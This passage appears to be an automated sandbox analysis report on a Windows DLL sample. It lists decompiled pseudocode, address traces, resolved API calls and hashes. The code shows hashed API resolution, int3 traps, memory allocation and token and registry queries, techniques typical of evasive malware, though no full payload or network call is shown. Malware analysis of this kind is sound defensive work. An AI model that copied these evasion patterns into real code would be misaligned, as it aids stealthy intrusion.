								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6E7D306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6E7D0FD4(_t403, _t413, _t403);
								}
								E6E7CF654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6E7CBB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6E7CBB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6e7d073f
0x6e7d0741
0x6e7d0748
0x6e7d0fc7
0x6e7d0fcd
0x6e7d0fcd
0x6e7d0752
0x6e7d075e
0x6e7d076a
0x6e7d076f
0x6e7d077c
0x6e7d078d
0x6e7d078f
0x6e7d0790
0x6e7d0791
0x6e7d0791
0x6e7d0792
0x6e7d0796
0x6e7d079a
0x6e7d079f
0x6e7d07a2
0x6e7d07a8
0x6e7d07c2
0x6e7d07c9
0x6e7d07cc
0x6e7d07cf
0x6e7d07d1
0x6e7d07dd
0x6e7d07ea
0x6e7d07f7
0x6e7d07fb
0x6e7d0887
0x6e7d0887
0x6e7d0889
0x6e7d088d
0x6e7d0898
0x6e7d08ae
0x6e7d08b1
0x6e7d08b1
0x6e7d08b5
0x6e7d08be
0x6e7d08c3
0x6e7d08c3
0x6e7d08c5
0x6e7d08d6
0x6e7d08f8
0x6e7d08fa
0x6e7d08fb
0x6e7d08ff
0x6e7d08ff
0x6e7d0908
0x6e7d0914
0x6e7d091d
0x6e7d0933
0x6e7d0943
0x6e7d0948
0x6e7d094c
0x6e7d0951
0x6e7d0953
0x6e7d09a3
0x6e7d09b8
0x6e7d09bc
0x6e7d09c1
0x6e7d09d2
0x6e7d09e7
0x6e7d09eb
0x6e7d09f0
0x6e7d09f2
0x6e7d0a39
0x6e7d0a3c
0x6e7d0a8a
0x6e7d0a8d
0x6e7d0ace
0x6e7d0ad2
0x6e7d0ad7
0x6e7d0adc
0x6e7d0afb
0x6e7d0afb
0x6e7d0afb
0x6e7d0afd
0x00000000
0x6e7d0afd
0x6e7d0ade
0x6e7d0ae2
0x6e7d0ae4
0x6e7d0aeb
0x6e7d0aeb
0x6e7d0af1
0x6e7d0af1
0x6e7d0af3
0x6e7d0af6
0x6e7d0af6
0x00000000
0x6e7d0af3
0x6e7d0ae6
0x6e7d0ae9
0x6e7d0aef
0x6e7d0aef
0x00000000
0x6e7d0aef
0x00000000
0x6e7d0ae9
0x6e7d0a8f
0x6e7d0a92
0x00000000
0x00000000
0x6e7d0a98
0x6e7d0a9d
0x6e7d0aa2
0x6e7d0ac1
0x6e7d0ac1
0x6e7d0acb
0x00000000
0x6e7d0acb
0x6e7d0aa4
0x6e7d0aa8
0x6e7d0aaa
0x6e7d0ab1
0x6e7d0ab1
0x6e7d0ab7
0x6e7d0ab7
0x6e7d0ab9
0x6e7d0abc
0x6e7d0abc
0x00000000
0x6e7d0ab9
0x6e7d0aac
0x6e7d0aaf
0x6e7d0ab5
0x6e7d0ab5
0x00000000
0x6e7d0ab5
0x00000000
0x6e7d0aaf
0x6e7d0a3e
0x6e7d0a40
0x6e7d0a7f
0x6e7d0a82
0x6e7d0df4
0x6e7d0df9
0x6e7d0dfe
0x6e7d0e1d
0x6e7d0e1d
0x6e7d0e27
0x00000000
0x6e7d0e27
0x6e7d0e00
0x6e7d0e04
0x6e7d0e06
0x6e7d0e0d
0x6e7d0e0d
0x6e7d0e13
0x6e7d0e13
0x6e7d0e15
0x6e7d0e18
0x6e7d0e18
0x00000000
0x6e7d0e15
0x6e7d0e08
0x6e7d0e0b
0x6e7d0e11
0x6e7d0e11
0x00000000
0x6e7d0e11
0x00000000
0x6e7d0e0b
0x00000000
0x6e7d0a88
0x6e7d0a46
0x6e7d0a4b
0x6e7d0a50
0x6e7d0a6f
0x6e7d0a6f
0x6e7d0a79
0x00000000
0x6e7d0a79
0x6e7d0a52
0x6e7d0a56
0x6e7d0a58
0x6e7d0a5f
0x6e7d0a5f
0x6e7d0a65
0x6e7d0a65
0x6e7d0a67
0x6e7d0a6a
0x6e7d0a6a
0x00000000
0x6e7d0a67
0x6e7d0a5a
0x6e7d0a5d
0x6e7d0a63
0x6e7d0a63
0x00000000
0x6e7d0a63
0x00000000
0x6e7d0a5d
0x6e7d09f4
0x6e7d09f6
0x00000000
0x00000000
0x6e7d0a00
0x6e7d0a05
0x6e7d0a0a
0x6e7d0a29
0x6e7d0a29
0x6e7d0a33
0x00000000
0x6e7d0a33
0x6e7d0a0c
0x6e7d0a10
0x6e7d0a12
0x6e7d0a19
0x6e7d0a19
0x6e7d0a1f
0x6e7d0a1f
0x6e7d0a21
0x6e7d0a24
0x6e7d0a24
0x00000000
0x6e7d0a21
0x6e7d0a14
0x6e7d0a17
0x6e7d0a1d
0x6e7d0a1d
0x00000000
0x6e7d0a1d
0x00000000
0x6e7d0a17
0x6e7d0959
0x6e7d095e
0x6e7d0963
0x6e7d0982
0x6e7d0982
0x6e7d098c
0x00000000
0x6e7d098c
0x6e7d0965
0x6e7d0969
0x6e7d096b
0x6e7d0972
0x6e7d0972
0x6e7d0978
0x6e7d0978
0x6e7d097a
0x6e7d097d
0x6e7d097d
0x00000000
0x6e7d097a
0x6e7d096d
0x6e7d0970
0x6e7d0976
0x6e7d0976
0x00000000
0x6e7d0976
0x00000000
0x6e7d089a
0x6e7d089c
0x6e7d0b01
0x6e7d0b06
0x6e7d0b09
0x6e7d0b0e
0x6e7d0b10
0x6e7d0b25
0x6e7d0b28
0x6e7d0bf6
0x6e7d0bfe
0x6e7d0c01
0x6e7d0c16
0x6e7d0c20
0x6e7d0c20
0x6e7d0c22
0x6e7d0c24
0x6e7d0c33
0x6e7d0c3f
0x6e7d0c43
0x6e7d0c46
0x6e7d0c49
0x6e7d0c4c
0x00000000
0x6e7d0c4c
0x6e7d0b38
0x6e7d0b4a
0x6e7d0b4e
0x6e7d0bda
0x6e7d0bda
0x6e7d0be0
0x6e7d0beb
0x6e7d0be2
0x6e7d0be2
0x6e7d0be2
0x00000000
0x6e7d0be0
0x6e7d0b5b
0x6e7d0b5c
0x6e7d0b5e
0x6e7d0b64
0x6e7d0fb3
0x6e7d0fb8
0x6e7d0fba
0x00000000
0x00000000
0x6e7d0fc0
0x6e7d0b7b
0x6e7d0b7f
0x6e7d0b84
0x6e7d0b96
0x6e7d0b9a
0x6e7d0ba5
0x6e7d0ba6
0x6e7d0ba7
0x6e7d0ba8
0x6e7d0baa
0x6e7d0bb5
0x6e7d0e2d
0x6e7d0e2d
0x6e7d0bb5
0x6e7d0bbb
0x6e7d0bc4
0x6e7d0e3f
0x6e7d0e55
0x6e7d0e57
0x6e7d0e59
0x6e7d0f94
0x6e7d0f9b
0x00000000
0x6e7d0f9b
0x6e7d0e68
0x6e7d0e76
0x6e7d0e90
0x6e7d0e92
0x6e7d0e94
0x6e7d0fa5
0x6e7d0faa
0x6e7d0fac
0x00000000
0x00000000
0x6e7d0fae
0x6e7d0ea8
0x6e7d0eb3
0x6e7d0ec2
0x6e7d0ed4
0x6e7d0ed6
0x6e7d0ed8
0x6e7d0ee5
0x6e7d0ee5
0x6e7d0ef5
0x6e7d0f06
0x6e7d0f0b
0x6e7d0f0d
0x6e7d0f0f
0x6e7d0f16
0x6e7d0f17
0x6e7d0f17
0x6e7d0f23
0x6e7d0f44
0x6e7d0f4d
0x6e7d0f59
0x6e7d0f65
0x6e7d0f6a
0x6e7d0f6f
0x6e7d0f75
0x6e7d0f75
0x6e7d0f7a
0x6e7d0f80
0x00000000
0x6e7d0f86
0x6e7d0f88
0x00000000
0x6e7d0f88
0x6e7d0bca
0x6e7d0bca
0x6e7d0bcf
0x6e7d0bd5
0x6e7d0bd5
0x00000000
0x6e7d0bcf
0x6e7d0bc4
0x6e7d0898
0x6e7d0808
0x6e7d0809
0x6e7d080b
0x6e7d0811
0x6e7d0dde
0x6e7d0de3
0x6e7d0de5
0x00000000
0x00000000
0x6e7d0deb
0x6e7d0828
0x6e7d082c
0x6e7d0831
0x6e7d0847
0x6e7d085e
0x6e7d0862
0x6e7d0c5a
0x6e7d0c5a
0x6e7d0862
0x6e7d0868
0x6e7d0871
0x6e7d0c69
0x6e7d0c7a
0x6e7d0c7f
0x6e7d0c81
0x6e7d0c83
0x6e7d0db4
0x6e7d0db8
0x00000000
0x6e7d0db8
0x6e7d0c8f
0x6e7d0cb4
0x6e7d0cb6
0x6e7d0cb8
0x6e7d0dd0
0x6e7d0dd5
0x6e7d0dd7
0x00000000
0x00000000
0x6e7d0dd9
0x6e7d0cc9
0x6e7d0cd7
0x6e7d0cde
0x6e7d0cdf
0x6e7d0ce0
0x6e7d0cf2
0x6e7d0cf4
0x6e7d0cf6
0x00000000
0x00000000
0x6e7d0cfe
0x6e7d0d19
0x6e7d0d1b
0x6e7d0d1d
0x6e7d0dc2
0x6e7d0dc7
0x6e7d0dc9
0x00000000
0x00000000
0x6e7d0dcb
0x6e7d0d23
0x6e7d0d2a
0x6e7d0d2e
0x6e7d0d99
0x6e7d0d99
0x6e7d0d9b
0x6e7d0da2
0x6e7d0da2
0x6e7d0da8
0x6e7d0da8
0x6e7d0daa
0x6e7d0daf
0x6e7d0daf
0x00000000
0x6e7d0daa
0x6e7d0d9d
0x6e7d0da0
0x6e7d0da6
0x6e7d0da6
0x00000000
0x6e7d0da6
0x00000000
0x6e7d0da0
0x6e7d0d30
0x6e7d0d30
0x6e7d0d32
0x6e7d0d3e
0x6e7d0d43
0x6e7d0d45
0x00000000
0x00000000
0x6e7d0d47
0x6e7d0d4b
0x6e7d0d52
0x6e7d0d53
0x6e7d0d54
0x6e7d0d56
0x00000000
0x00000000
0x6e7d0d58
0x6e7d0d5a
0x6e7d0d61
0x6e7d0d61
0x6e7d0d67
0x6e7d0d67
0x6e7d0d69
0x6e7d0d6e
0x6e7d0d6e
0x6e7d0d77
0x6e7d0d7c
0x6e7d0d81
0x6e7d0d87
0x6e7d0d87
0x6e7d0d8c
0x00000000
0x6e7d0d8c
0x6e7d0d5c
0x6e7d0d5f
0x6e7d0d65
0x6e7d0d65
0x00000000
0x6e7d0d65
0x00000000
0x6e7d0d93
0x6e7d0d93
0x6e7d0d94
0x6e7d0d94
0x00000000
0x6e7d0d32
0x6e7d0877
0x6e7d087c
0x6e7d0882
0x6e7d0882
0x00000000
0x6e7d0c59
0x6e7d0c59
0x6e7d0c59

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6E7D085E
GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6E7D0C20
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6E7D0CB4

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: fce47443d5255100d84c84a6e2005daddd0366bd1f09e7fcb7283ad23f93cf1c
Instruction ID: 8d48f098bcdb29ec9217f72c2efb0d85fec0d5d2a94ba5baa070d71d24ddaff9
Opcode Fuzzy Hash: fce47443d5255100d84c84a6e2005daddd0366bd1f09e7fcb7283ad23f93cf1c
Instruction Fuzzy Hash: 0C22E570608341AFE760DFA4CA54BDF77AAAF81708F10992DE995971B4EB30D80DCB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D2234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6E7D2234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6E7D3AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6E7D306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6e7d2234
0x6e7d2238
0x6e7d2254
0x6e7d2257
0x6e7d223a
0x6e7d2249
0x6e7d224c
0x6e7d224c
0x6e7d2267
0x6e7d226c
0x6e7d2270
0x6e7d2278
0x6e7d2278
0x6e7d227c

APIs

NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6E7C4B17,00000000,00000000,?), ref: 6E7D2278

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction ID: d613b95019a34c546b222684583a9ea43caf17ade259988750dbea48b797ef51
Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction Fuzzy Hash: 33E065B020E302BDE7449A689D04B6F36D8AF84610F21893DB468D7194E67094058761

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D2820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E7D2820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6E7D306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6e7d2827
0x6e7d2830
0x6e7d283e
0x6e7d2861
0x6e7d2861
0x6e7d2840
0x6e7d2857
0x6e7d285b
0x00000000
0x6e7d285d
0x6e7d285d
0x6e7d285d
0x6e7d285b
0x6e7d2866

APIs

NtAllocateVirtualMemory.NTDLL(6E7D88E6,?,00000000,000000FF,6E7D88E6,6E7D88E6,60A28C5C,60A28C5C,?,?,6E7D88E6,00003000,00000004,000000FF), ref: 6E7D2857

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction ID: 0d23bbbe092875e13a3e448f94bffec0e9027a34582646c45c0142a7e740a006
Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction Fuzzy Hash: 0CE03971209382AFEB08DA99CD24E6BB7E9EFC4605F108C2DB494C6260D730D8159B25

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D3138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E7D3138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6E7D34B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6e7d3138
0x6e7d313d
0x6e7d313f
0x6e7d3141

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6E7D34B0,6E7D3128,60A28C5C,60A28C5C,?,6E7C6C99,00000000), ref: 6E7D313F

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: c00f33c5829bfc09aee2d9ed5d4395107a182010dae9e749ce7d24dcaf70192a
Instruction ID: c49e36dae779a2ea72f9f034bf82dde2252acfc1e894f826f9c40a2f1e87ca5c
Opcode Fuzzy Hash: c00f33c5829bfc09aee2d9ed5d4395107a182010dae9e749ce7d24dcaf70192a
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5E84, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E7D5E84(void* __ecx, void* __eflags, void* _a4, char _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6E7CC280(_t19) == 0) {
					_t2 =  &_a8; // 0x6e7d5d79
					_v12 =  *_t2;
					if(E6E7D3064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6E7D35F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6e7d5e87
0x6e7d5e89
0x6e7d5e95
0x6e7d5e9b
0x6e7d5e9f
0x6e7d5eb5
0x6e7d5ed4
0x6e7d5eb7
0x6e7d5ec8
0x6e7d5ecc
0x6e7d5eec
0x6e7d5ece
0x6e7d5ece
0x6e7d5ece
0x6e7d5ecc
0x6e7d5ed5
0x6e7d5eda
0x6e7d5ee3
0x6e7d5edc
0x6e7d5edc
0x6e7d5ede
0x6e7d5ede
0x6e7d5e97
0x6e7d5e97
0x6e7d5e97
0x6e7d5ee9

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6E7D5D79,00000000,?,00000000,?), ref: 6E7D5EC8

Strings

y]}n, xrefs: 6E7D5E9B

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID: y]}n
API String ID: 2738559852-1670170125
Opcode ID: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction ID: 6fce37af055b3fc7e81cc09ed0b157b6c4f21c2308fc964f420131d039ebe3c0
Opcode Fuzzy Hash: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction Fuzzy Hash: 78F03631258207EFD751FEA9AE10AAA77DDEF45254F144C3AA895CA160EA32D408CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D10A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E7D10A4(void* __ebx, void* __ecx) {
				intOrPtr* _t34;
				long* _t55;
				long* _t59;
				intOrPtr* _t64;
				void* _t73;
				void* _t74;
				void* _t79;
				long* _t80;

				_t74 = __ecx;
				_t80[7] = 0;
				_t64 = E6E7D306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t64 != 0) {
					 *_t64(_t74, 8,  &(_t80[7]));
				}
				_t55 = _t80;
				 *_t55 = _t80[7];
				_t55[1] = 1;
				if(E6E7CC280(_t55) != 0) {
					L6:
					if(_t80[1] != 0) {
						E6E7CBB44(_t80);
					}
					return 0;
				}
				_t80[6] = 0;
				if(E6E7D306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
					GetTokenInformation(_t80[4], 0x19, 0, 0,  &(_t80[6])); // executed
				}
				_t30 = _t80[6];
				if(_t80[6] != 0) {
					E6E7CF584( &(_t80[3]), _t30);
					_t59 =  &(_t80[3]);
					_t73 = E6E7CF4BC(_t59, 0);
					_t34 = E6E7D306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
					if (_t34 == 0) goto L33;
					 *_t34 =  *_t34 + _t34;
					 *((intOrPtr*)(_t79 + 0x50182444)) =  *((intOrPtr*)(_t79 + 0x50182444)) + _t59;
				} else {
					goto L6;
				}
			}

0x6e7d10b3
0x6e7d10b5
0x6e7d10c4
0x6e7d10c8
0x6e7d10d2
0x6e7d10d2
0x6e7d10d8
0x6e7d10db
0x6e7d10dd
0x6e7d10e8
0x6e7d1122
0x6e7d1127
0x6e7d112c
0x6e7d112c
0x00000000
0x6e7d1131
0x6e7d10f4
0x6e7d1107
0x6e7d1118
0x6e7d1118
0x6e7d111a
0x6e7d1120
0x6e7d113e
0x6e7d1145
0x6e7d114e
0x6e7d115c
0x6e7d1165
0x6e7d1168
0x6e7d116a
0x00000000
0x00000000
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E7D1118
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E7D117B

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
Instruction ID: d7b7128ddbadfc43d7f9b3bbd02bfccb75acae5ed44a867d0ba160d709673b1b
Opcode Fuzzy Hash: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
Instruction Fuzzy Hash: 13411570344243AFE715D9E8EE24BAF76DD9B91704F108878B950CA1B4DB32D84DCB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D57B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E7D57B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6E7D3064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6E7CF828(_a8, _t15);
							if(E6E7D3064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6E7CF4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6e7d57b8
0x6e7d57b9
0x6e7d57bb
0x6e7d57c0
0x6e7d57c7
0x6e7d57cb
0x6e7d57cb
0x6e7d57cb
0x6e7d57cf
0x6e7d5815
0x6e7d5815
0x6e7d57d1
0x6e7d57d1
0x6e7d57d7
0x6e7d57e0
0x6e7d57e3
0x6e7d57fa
0x6e7d580b
0x6e7d580b
0x6e7d580d
0x6e7d5813
0x6e7d581e
0x6e7d5836
0x6e7d5856
0x6e7d5856
0x6e7d5858
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d57d7
0x6e7d5860

APIs

RegQueryValueExA.KERNELBASE(?,6E7DD1F8,00000000,?,00000000,00000000,?,?,?,6E7DD1F8,?,6E7D5887,?,00000000,00000000), ref: 6E7D580B
RegQueryValueExA.KERNELBASE(?,6E7DD1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6E7DD1F8,?,6E7D5887,?,00000000), ref: 6E7D5856

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction ID: 18ac8432375179d375f7ccad1f271556ac83302390b8f26747af2f1594a3d18b
Opcode Fuzzy Hash: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction Fuzzy Hash: A011B43020D305EBD610DEA5FE90EABBBDCEF45B64F10882DB49897161EB21E804CB71

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6E7D5B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6E7CD1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6E7CD6D0(__ecx, _t60);
					E6E7CCFF8(_t56,  *_t60);
					E6E7CCFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6E7D62B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6E7D3064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6E7CC26C(_t40);
					if(E6E7CC280(_t40) != 0) {
						_t56[2] = E6E7D35F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6E7D3064(0x8e844d1e, 0xba53868);
